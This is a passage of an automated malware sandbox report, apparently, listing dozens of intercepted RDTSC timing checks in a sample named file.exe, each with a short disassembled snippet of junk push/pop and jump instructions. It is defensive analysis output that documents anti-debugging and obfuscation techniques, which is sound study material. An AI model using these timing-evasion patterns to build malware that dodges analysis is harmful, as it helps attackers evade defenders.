                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10359B4 second address: 10359B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10359B8 second address: 10359CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B9132D69Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10359CF second address: 10359D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103BA47 second address: 103BA64 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 je 00007F4B9132D696h 0x00000009 jmp 00007F4B9132D69Bh 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F4B9132D696h 0x00000017 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103BE59 second address: 103BE5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103BFE2 second address: 103BFE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103C173 second address: 103C177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103B2BE second address: 103B2C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103B2C2 second address: 103B2C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10410DF second address: 10410E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10410E6 second address: 10410EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10410EB second address: 10410F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104260A second address: 104261A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4B90BE6228h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104261A second address: 1042626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7D0A2 second address: F7D0A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104A9CE second address: 104A9D8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4B9132D696h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104A9D8 second address: 104A9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4B90BE622Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104A9EF second address: 104A9F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055578 second address: 1055582 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4B90BE6226h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055582 second address: 10555AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4B9132D6A3h 0x00000010 jmp 00007F4B9132D69Ah 0x00000015 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10555AA second address: 10555CC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F4B90BE6236h 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10555CC second address: 10555D8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4B9132D69Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1054F80 second address: 1054F94 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4B90BE6226h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnc 00007F4B90BE6226h 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10574D8 second address: 10574DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105706D second address: 1057071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F9A3 second address: 105F9A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1068A71 second address: 1068A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1068A75 second address: 1068A87 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4B9132D696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F4B9132D698h 0x00000010 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1068A87 second address: 1068A8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B9CC second address: 106B9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B9D0 second address: 106B9D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107227E second address: 107228A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4B9132D69Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10724F9 second address: 107251C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F4B90BE622Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F4B90BE622Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107251C second address: 1072529 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107293D second address: 1072941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1072941 second address: 107294F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107294F second address: 1072953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1072953 second address: 1072957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1072BFF second address: 1072C16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6233h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1072C16 second address: 1072C1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1072C1C second address: 1072C51 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4B90BE6236h 0x0000000f jmp 00007F4B90BE6235h 0x00000014 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1084218 second address: 1084225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F4B9132D696h 0x0000000c popad 0x0000000d rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10840B2 second address: 10840C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F4B90BE6226h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007F4B90BE6226h 0x00000017 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10840C9 second address: 10840E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4B9132D69Ah 0x0000000c jp 00007F4B9132D696h 0x00000012 jns 00007F4B9132D696h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10840E9 second address: 10840EE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10840EE second address: 10840F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1089252 second address: 1089279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B90BE6232h 0x00000009 jmp 00007F4B90BE6230h 0x0000000e popad 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1089279 second address: 1089296 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4B9132D6A8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10964EF second address: 1096512 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F4B90BE6236h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1096293 second address: 1096299 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B020A second address: 10B021B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE622Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B021B second address: 10B0236 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4B9132D698h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e je 00007F4B9132D696h 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0236 second address: 10B023A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B023A second address: 10B0251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B9132D69Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AEF41 second address: 10AEF4D instructions: 0x00000000 rdtsc 0x00000002 js 00007F4B90BE6226h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AEF4D second address: 10AEF7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4B9132D6A5h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F4B9132D696h 0x00000016 jmp 00007F4B9132D69Ch 0x0000001b rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF0DA second address: 10AF0DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF3EF second address: 10AF404 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4B9132D69Ah 0x00000008 pushad 0x00000009 jnc 00007F4B9132D696h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF404 second address: 10AF43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B90BE6236h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F4B90BE6235h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF5AB second address: 10AF5D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F4B9132D6B2h 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFBF8 second address: 10AFC17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6237h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFC17 second address: 10AFC1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFEF5 second address: 10AFEFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFEFB second address: 10AFF02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AFF02 second address: 10AFF07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B18E7 second address: 10B18EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B18EF second address: 10B18F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B419A second address: 10B41A0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B43F3 second address: 10B43F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B43F8 second address: 10B43FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B4722 second address: 10B4779 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4B90BE6228h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F4B90BE6228h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 mov dword ptr [ebp+12468C38h], edi 0x0000002f push dword ptr [ebp+122D37E0h] 0x00000035 mov dword ptr [ebp+12477CBBh], edi 0x0000003b push 73D0F7A9h 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F4B90BE622Bh 0x00000048 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B4779 second address: 10B4787 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F4B9132D696h 0x0000000e rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B4787 second address: 10B478B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD0E87 second address: 4AD0E8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD0E8B second address: 4AD0E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD0E91 second address: 4AD0EBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F4B9132D6A0h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov cx, dx 0x00000019 popad 0x0000001a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD0EBF second address: 4AD0ED3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4B90BE6230h 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0DE8 second address: 4AC0DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0DEC second address: 4AC0DF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0DF0 second address: 4AC0DF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0DF6 second address: 4AC0E1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edx, 7F999D0Ch 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e jmp 00007F4B90BE6230h 0x00000013 mov dword ptr [esp], ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0E1C second address: 4AC0E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0E21 second address: 4AC0E27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0E27 second address: 4AC0E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0E2B second address: 4AC0E51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov ax, bx 0x0000000e push eax 0x0000000f push edx 0x00000010 call 00007F4B90BE6235h 0x00000015 pop ecx 0x00000016 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B00BE5 second address: 4B00BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B00BE9 second address: 4B00BED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B00BED second address: 4B00BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA00AC second address: 4AA00B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA00B2 second address: 4AA00EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007F4B9132D69Eh 0x00000010 mov esi, 4F7CA5E1h 0x00000015 pop eax 0x00000016 mov dx, 6592h 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA00EC second address: 4AA00F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA00F0 second address: 4AA00F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA00F6 second address: 4AA00FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA00FC second address: 4AA0100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0100 second address: 4AA0155 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F4B90BE6232h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F4B90BE622Dh 0x00000019 sbb al, FFFFFFC6h 0x0000001c jmp 00007F4B90BE6231h 0x00000021 popfd 0x00000022 call 00007F4B90BE6230h 0x00000027 pop esi 0x00000028 popad 0x00000029 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0155 second address: 4AA0171 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0171 second address: 4AA0189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B90BE6233h 0x00000009 popad 0x0000000a rdtsc
